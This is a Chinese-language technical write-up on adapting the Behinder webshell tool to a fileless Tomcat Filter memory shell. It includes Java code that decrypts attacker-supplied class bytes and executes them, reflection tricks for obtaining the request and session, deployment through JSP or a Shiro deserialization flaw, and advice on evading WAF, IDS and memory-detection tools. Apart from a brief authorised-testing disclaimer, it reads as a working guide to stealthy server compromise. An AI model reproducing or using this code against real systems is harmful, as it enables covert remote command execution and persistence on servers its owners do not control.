冰蝎改造适配Tomcat Filter无文件WebShell技术文档<\/h1>

一、背景与概述<\/h2>
本文档详细介绍了如何改造冰蝎(Behinder)工具，使其适配基于Tomcat Filter的无文件WebShell实现。传统WebShell通常需要上传文件到服务器，而无文件WebShell通过内存驻留技术实现持久化，具有更强的隐蔽性和对抗性。<\/p>

二、技术准备<\/h2>

2.1 所需依赖<\/h3>
创建Maven项目，需添加以下依赖：<\/p>
<dependencies><\/span>
<\/span><\/span>    <dependency><\/span>
<\/span><\/span>        <groupId><\/span>junit<\/groupId><\/span>
<\/span><\/span>        <artifactId><\/span>junit<\/artifactId><\/span>
<\/span><\/span>        <version><\/span>4.11<\/version><\/span>
<\/span><\/span>        <scope><\/span>test<\/scope><\/span>
<\/span><\/span>    <\/dependency><\/span>
<\/span><\/span>    <dependency><\/span>
<\/span><\/span>        <groupId><\/span>org.json<\/groupId><\/span>
<\/span><\/span>        <artifactId><\/span>json<\/artifactId><\/span>
<\/span><\/span>        <version><\/span>20170516<\/version><\/span>
<\/span><\/span>    <\/dependency><\/span>
<\/span><\/span>    <dependency><\/span>
<\/span><\/span>        <groupId><\/span>javax.servlet.jsp<\/groupId><\/span>
<\/span><\/span>        <artifactId><\/span>jsp-api<\/artifactId><\/span>
<\/span><\/span>        <version><\/span>2.1<\/version><\/span>
<\/span><\/span>        <scope><\/span>provided<\/scope><\/span>
<\/span><\/span>    <\/dependency><\/span>
<\/span><\/span>    <dependency><\/span>
<\/span><\/span>        <groupId><\/span>asm<\/groupId><\/span>
<\/span><\/span>        <artifactId><\/span>asm-all<\/artifactId><\/span>
<\/span><\/span>        <version><\/span>3.3.1<\/version><\/span>
<\/span><\/span>    <\/dependency><\/span>
<\/span><\/span>    <dependency><\/span>
<\/span><\/span>        <groupId><\/span>javax.servlet<\/groupId><\/span>
<\/span><\/span>        <artifactId><\/span>servlet-api<\/artifactId><\/span>
<\/span><\/span>        <version><\/span>2.5<\/version><\/span>
<\/span><\/span>        <scope><\/span>provided<\/scope><\/span>
<\/span><\/span>    <\/dependency><\/span>
<\/span><\/span>    <dependency><\/span>
<\/span><\/span>        <groupId><\/span>org.xerial<\/groupId><\/span>
<\/span><\/span>        <artifactId><\/span>sqlite-jdbc<\/artifactId><\/span>
<\/span><\/span>        <version><\/span>3.31.1<\/version><\/span>
<\/span><\/span>    <\/dependency><\/span>
<\/span><\/span>    <dependency><\/span>
<\/span><\/span>        <groupId><\/span>org.apache.tomcat.embed<\/groupId><\/span>
<\/span><\/span>        <artifactId><\/span>tomcat-embed-core<\/artifactId><\/span>
<\/span><\/span>        <version><\/span>7.0.25<\/version><\/span>
<\/span><\/span>    <\/dependency><\/span>
<\/span><\/span><\/dependencies><\/span>
<\/span><\/span><\/code><\/pre>2.2 冰蝎反编译<\/h3>

将冰蝎的jar包导入项目<\/li>
使用IDEA反编译工具获取源代码<\/li>
将反编译结果拷贝到项目中并做适当修改<\/li>
冰蝎的主类位于ui.Starter<\/code><\/li>
<\/ol>
三、技术原理分析<\/h2>
3.1 冰蝎工作原理<\/h3>
冰蝎通过以下机制实现WebShell功能：<\/p>

上传class字节码到目标服务器<\/li>
使用ClassLoader的defineClass方法将字节码转换为Class对象<\/li>
实例化上传的类，通过equals方法传递PageContext<\/li>
通过PageContext获取Request、Response、Session等对象<\/li>
<\/ol>
3.2 Filter内存马限制<\/h3>
传统Filter内存马与冰蝎的适配问题：<\/p>

Filter中只有Request和Response对象<\/li>
Session需要通过Request获取：((HttpServletRequest)request).getSession()<\/code><\/li>
冰蝎payload依赖的三个关键对象：

Request - 获取请求<\/li>
Response - 写入响应结果<\/li>
Session - 存放AES加密密钥<\/li>
<\/ul>
<\/li>
<\/ol>
四、实现方案<\/h2>
4.1 方法一：反射获取Request对象<\/h3>

从ResponseFacade中反射获取内部Response对象：<\/li>
<\/ol>
Field responseField =<\/span> ResponseFacade.<\/span>class<\/span>.<\/span>getDeclaredField<\/span>(<\/span>"response"<\/span>);<\/span>
<\/span><\/span>responseField.<\/span>setAccessible<\/span>(<\/span>true<\/span>);<\/span>
<\/span><\/span>org.<\/span>apache<\/span>.<\/span>catalina<\/span>.<\/span>connector<\/span>.<\/span>Response<\/span> resp =<\/span> (<\/span>Response)<\/span> responseField.<\/span>get<\/span>((<\/span>ResponseFacade)<\/span> response);<\/span>
<\/span><\/span><\/code><\/pre>
从Response对象获取Request和Session：<\/li>
<\/ol>
ServletRequest request =<\/span> resp.<\/span>getRequest<\/span>();<\/span>
<\/span><\/span>HttpSession session =<\/span> resp.<\/span>getRequest<\/span>().<\/span>getSession<\/span>();<\/span>
<\/span><\/span><\/code><\/pre>
Filter内存马核心代码：<\/li>
<\/ol>
try<\/span> {<\/span>
<\/span><\/span>    if<\/span> (<\/span>u !=<\/span> null<\/span>)<\/span> {<\/span>
<\/span><\/span>        Cipher c =<\/span> Cipher.<\/span>getInstance<\/span>(<\/span>"AES"<\/span>);<\/span>
<\/span><\/span>        c.<\/span>init<\/span>(<\/span>2<\/span>,<\/span> new<\/span> SecretKeySpec((<\/span>u +<\/span> ""<\/span>).<\/span>getBytes<\/span>(),<\/span> "AES"<\/span>));<\/span>
<\/span><\/span>        byte<\/span>[]<\/span> evilClassBytes =<\/span> c.<\/span>doFinal<\/span>(<\/span>new<\/span> sun.<\/span>misc<\/span>.<\/span>BASE64Decoder<\/span>().<\/span>decodeBuffer<\/span>(<\/span>request.<\/span>getReader<\/span>().<\/span>readLine<\/span>()));<\/span>
<\/span><\/span>        Class evilClass =<\/span> new<\/span> U(<\/span>this<\/span>.<\/span>getClass<\/span>().<\/span>getClassLoader<\/span>()).<\/span>g<\/span>(<\/span>evilClassBytes);<\/span>
<\/span><\/span>        evilClass.<\/span>newInstance<\/span>().<\/span>equal<\/span>(<\/span>response);<\/span>
<\/span><\/span>        return<\/span>;<\/span>
<\/span><\/span>    }<\/span>
<\/span><\/span>}<\/span> catch<\/span> (<\/span>Exception e)<\/span> {<\/span>
<\/span><\/span>}<\/span>
<\/span><\/span>chain.<\/span>doFilter<\/span>(<\/span>request,<\/span> response);<\/span>
<\/span><\/span><\/code><\/pre>注意<\/strong>：此方法在实际使用中可能会持续报错，需要进一步调试解决。<\/p>
4.2 方法二：修改Payload入口点（推荐）<\/h3>

修改冰蝎payload，不再使用equals方法作为入口点<\/li>
添加新方法作为入口：<\/li>
<\/ol>
public<\/span> boolean<\/span> fuck<\/span>(<\/span>ServletRequest request,<\/span> ServletResponse response)<\/span>
<\/span><\/span><\/code><\/pre>

调整payload中所有对request、response和session的引用<\/p>
<\/li>

Filter内存马实现：<\/p>
<\/li>
<\/ol>
Cipher c =<\/span> Cipher.<\/span>getInstance<\/span>(<\/span>"AES"<\/span>);<\/span>
<\/span><\/span>c.<\/span>init<\/span>(<\/span>2<\/span>,<\/span> new<\/span> SecretKeySpec((<\/span>u +<\/span> ""<\/span>).<\/span>getBytes<\/span>(),<\/span> "AES"<\/span>));<\/span>
<\/span><\/span>byte<\/span>[]<\/span> evilClassBytes =<\/span> c.<\/span>doFinal<\/span>(<\/span>new<\/span> sun.<\/span>misc<\/span>.<\/span>BASE64Decoder<\/span>().<\/span>decodeBuffer<\/span>(<\/span>request.<\/span>getReader<\/span>().<\/span>readLine<\/span>()));<\/span>
<\/span><\/span>Class evilClass =<\/span> new<\/span> U(<\/span>this<\/span>.<\/span>getClass<\/span>().<\/span>getClassLoader<\/span>()).<\/span>g<\/span>(<\/span>evilClassBytes);<\/span>
<\/span><\/span>Object a =<\/span> evilClass.<\/span>newInstance<\/span>();<\/span>
<\/span><\/span>Method b =<\/span> evilClass.<\/span>getDeclaredMethod<\/span>(<\/span>"fuck"<\/span>,<\/span> ServletRequest.<\/span>class<\/span>,<\/span> ServletResponse.<\/span>class<\/span>);<\/span>
<\/span><\/span>b.<\/span>invoke<\/span>(<\/span>a,<\/span> request,<\/span> response);<\/span>
<\/span><\/span>return<\/span>;<\/span>
<\/span><\/span><\/code><\/pre>五、部署与测试<\/h2>

将生成的Filter通过JSP或Shiro反序列化漏洞加载到Tomcat系统<\/li>
正常访问网站应显示正常页面<\/li>
通过改造后的冰蝎客户端连接：

URL可随意填写<\/li>
连接成功后应能正常执行命令和管理<\/li>
<\/ul>
<\/li>
<\/ol>
六、注意事项<\/h2>

此技术仅限安全研究和授权测试使用<\/li>
实际应用中需要考虑对抗WAF和IDS的检测<\/li>
内存驻留的稳定性需要进一步测试<\/li>
建议对通信内容进行加密和混淆<\/li>
<\/ol>
七、扩展思考<\/h2>

可探索其他类型内存马的适配（如Servlet、Listener等）<\/li>
考虑结合其他持久化技术增强隐蔽性<\/li>
研究对抗内存检测的方法（如Java Agent检测）<\/li>
优化通信协议减少特征<\/li>
<\/ol>
本技术文档提供了完整的技术实现路径，关键点均已涵盖，实际实施时需根据具体环境进行调整和优化。<\/p>